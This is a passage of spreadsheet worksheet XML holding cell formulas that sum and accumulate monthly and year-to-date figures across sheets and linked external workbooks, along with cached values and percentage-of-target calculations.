      <c r="Q71" s="271" t="str">
        <f>'[8]24'!$Q$80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G72+'23'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'23'!K72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G73+'23'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'23'!K73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G74+'23'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'23'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]24'!$Q$83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G75+'23'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'23'!K75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G76+'23'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'23'!K76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G77+'23'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'23'!K77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G78+'23'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'23'!K78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'[16]24'!$E$7</f>
        <v>361.02</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'23'!H79</f>
        <v>12674.12</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>159802.59</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]24'!$I$7</f>
        <v>472.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'23'!K79</f>
        <v>12067.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>153958.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]24'!$L$7</f>
        <v>5491.4</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.9828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'[16]24'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'23'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]24'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'23'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]24'!$Y$15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G81+'23'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'23'!K81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G82+'23'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'23'!K82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G83+'23'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'23'!K83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G84+'23'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'23'!K84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G85+'23'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'23'!K85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25/31</f>
        <v>0.806451612903226</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46016</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18411.66</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'24'!H5</f>
        <v>523420.59</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6678286.62</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23227.25</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'24'!K5</f>
        <v>578518.457</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6728589.588</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>212369.957</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>56.7834109625668</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]25'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]25'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]25'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]25'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]25'!$U$101</f>
        <v>38.4945</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]25'!$V$101</f>
        <v>62.8399025069638</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]25'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]25'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]25'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]25'!$D$23+'[11]25'!$D$17+'[12]25'!$D$17+'[13]25'!$D$25+'[14]25'!$D$8+'[14]25'!$D$15+'[15]25'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]25'!$E$23+'[11]25'!$E$17+'[12]25'!$E$17+'[13]25'!$E$25+'[14]25'!$E$8+'[14]25'!$E$15+'[15]25'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'24'!H6</f>
        <v>6590</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>282939.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]25'!$I$23+'[11]25'!$I$17+'[12]25'!$I$17+'[13]25'!$I$25+'[14]25'!$E$23+'[14]25'!$E$30+'[15]25'!$H$7</f>
        <v>740.88</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'24'!K6</f>
        <v>18629.52</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>280827.22</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]25'!$L$23+'[11]25'!$L$17+'[12]25'!$L$17+'[13]25'!$L$25+'[14]25'!$H$23+'[14]25'!$H$30+'[15]25'!$K$7</f>
        <v>20073.32</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]25'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]25'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]25'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]25'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]25'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]25'!$V$102</f>
        <v>33.0222725162488</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]25'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]25'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]25'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]25'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]25'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'24'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]25'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'24'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]25'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]25'!$W$107</f>
        <v>0</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]25'!$X$107</f>
        <v>126.793424440483</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]25'!$Y$107</f>
        <v>131.45755109793</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]25'!$T$107</f>
        <v>0</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]25'!$U$107</f>
        <v>42.075</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]25'!$V$107</f>
        <v>31.7766945218198</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]25'!$Q$107</f>
        <v>0</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]25'!$R$107</f>
        <v>252.45</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]25'!$S$107</f>
        <v>2737.88</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]25'!$D$27+'[11]25'!$D$18+'[13]25'!$D$26+'[14]25'!$D$10+'[14]25'!$D$17+'[15]25'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]25'!$E$27+'[11]25'!$E$18+'[13]25'!$E$26+'[14]25'!$E$10+'[14]25'!$E$17+'[15]25'!$E$9</f>
        <v>2583</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'24'!H8</f>
        <v>51831</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>577367.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]25'!$I$27+'[11]25'!$I$18+'[13]25'!$I$26+'[14]25'!$E$25+'[14]25'!$E$32+'[15]25'!$H$9</f>
        <v>2309.94</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'24'!K8</f>
        <v>63130.98</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>570875.69</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]25'!$L$27+'[11]25'!$L$18+'[13]25'!$L$26+'[14]25'!$H$25+'[14]25'!$H$32+'[15]25'!$K$9</f>
        <v>30579.92</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]25'!$W$108</f>
        <v>147</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]25'!$X$108</f>
        <v>133.125112188117</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]25'!$Y$108</f>
        <v>128.065767148744</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]25'!$T$108</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]25'!$U$108</f>
        <v>46.425</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]25'!$V$108</f>
        <v>28.7302692664809</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]25'!$Q$108</f>
        <v>8</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]25'!$R$108</f>
        <v>278.55</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]25'!$S$108</f>
        <v>2475.4</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]25'!$D$24+'[11]25'!$D$19+'[12]25'!$D$20+'[13]25'!$D$27+'[14]25'!$D$11+'[14]25'!$D$18+'[15]25'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]25'!$E$24+'[11]25'!$E$19+'[12]25'!$E$20+'[13]25'!$E$27+'[14]25'!$E$11+'[14]25'!$E$18+'[15]25'!$E$10</f>
        <v>12289</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'24'!H9</f>
        <v>373765</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4509153.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]25'!$I$24+'[11]25'!$I$19+'[12]25'!$I$20+'[13]25'!$I$27+'[14]25'!$E$26+'[14]25'!$E$33+'[15]25'!$H$10</f>
        <v>17156.56</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'24'!K9</f>
        <v>392450.007</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4489928.818</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]25'!$L$24+'[11]25'!$L$19+'[12]25'!$L$20+'[13]25'!$L$27+'[14]25'!$H$26+'[14]25'!$H$33+'[15]25'!$K$10</f>
        <v>92180.705</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]25'!$W$109</f>
        <v>294.506612410987</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]25'!$X$109</f>
        <v>268.769017980636</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]25'!$Y$109</f>
        <v>271.129862671744</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]25'!$T$109</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]25'!$U$109</f>
        <v>36.15</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]25'!$V$109</f>
        <v>34.9639043639739</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]25'!$Q$109</f>
        <v>9.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]25'!$R$109</f>
        <v>216.9</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]25'!$S$109</f>
        <v>3012.48999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]25'!$D$25+'[11]25'!$D$20+'[12]25'!$D$21+'[13]25'!$D$28+'[14]25'!$D$12+'[14]25'!$D$19+'[15]25'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]25'!$E$25+'[11]25'!$E$20+'[12]25'!$E$21+'[13]25'!$E$28+'[14]25'!$E$12+'[14]25'!$E$19+'[15]25'!$E$11</f>
        <v>2680</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'24'!H10</f>
        <v>61176</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>978703.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]25'!$I$25+'[11]25'!$I$20+'[12]25'!$I$21+'[13]25'!$I$28+'[14]25'!$E$27+'[14]25'!$E$34+'[15]25'!$H$11</f>
        <v>2336.6</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'24'!K10</f>
        <v>70812.5</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>968041.22</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]25'!$L$25+'[11]25'!$L$20+'[12]25'!$L$21+'[13]25'!$L$28+'[14]25'!$H$27+'[14]25'!$H$34+'[15]25'!$K$11</f>
        <v>51570.442</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]25'!$W$110</f>
        <v>253.102746693795</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]25'!$X$110</f>
        <v>250.262061550867</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]25'!$Y$110</f>
        <v>267.461813215323</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]25'!$T$110</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]25'!$U$110</f>
        <v>37.205</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]25'!$V$110</f>
        <v>34.6714252553389</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]25'!$Q$110</f>
        <v>9.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]25'!$R$110</f>
        <v>223.23</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]25'!$S$110</f>
        <v>2987.29</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]25'!$D$26+'[11]25'!$D$21+'[12]25'!$D$19+'[13]25'!$D$29+'[14]25'!$D$13+'[14]25'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]25'!$E$26+'[11]25'!$E$21+'[12]25'!$E$19+'[13]25'!$E$29+'[14]25'!$E$13+'[14]25'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'24'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]25'!$I$26+'[11]25'!$I$21+'[12]25'!$I$19+'[13]25'!$I$29+'[14]25'!$E$28+'[14]25'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'24'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]25'!$L$26+'[11]25'!$L$21+'[12]25'!$L$19+'[13]25'!$L$29+'[14]25'!$H$28+'[14]25'!$H$35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5190.99000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'24'!H12</f>
        <v>190824.270000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5133215.52</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>14967.88</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'24'!K12</f>
        <v>417564.57</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5446670.946</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>195340.055000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>44.4965956719933</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]25'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]25'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]25'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]25'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]25'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]25'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]25'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]25'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]25'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'24'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'24'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>35.8422119266148</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]25'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]25'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]25'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]25'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]25'!$U$68</f>
        <v>65.1616666666667</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]25'!$V$68</f>
        <v>71.1060817084494</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]25'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]25'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]25'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2948</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'24'!H14</f>
        <v>67067</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1031610.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6347.31</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'24'!K14</f>
        <v>134285.765</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1927229.871</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>55872.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]25'!$W$71</f>
        <v>233.375</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]25'!$X$71</f>
        <v>220.228855721393</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]25'!$Y$71</f>
        <v>213.969212107209</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]25'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]25'!$U$71</f>
        <v>50.25</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]25'!$V$71</f>
        <v>50.2321262766945</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]25'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]25'!$R$71</f>
        <v>301.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]25'!$S$71</f>
        <v>4328.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'24'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'24'!K15</f>
        <v>7551.705</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>122308.205</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]25'!$W$72</f>
        <v>59.7083333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]25'!$X$72</f>
        <v>63.4367748680419</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]25'!$Y$72</f>
        <v>61.4735006176202</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]25'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]25'!$U$72</f>
        <v>65.3616666666667</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]25'!$V$72</f>
        <v>51.7719359331476</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]25'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]25'!$R$72</f>
        <v>392.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]25'!$S$72</f>
        <v>4460.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'24'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'24'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]25'!$W$73</f>
        <v>58.0444444444444</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]25'!$X$73</f>
        <v>61.1909599418065</v>
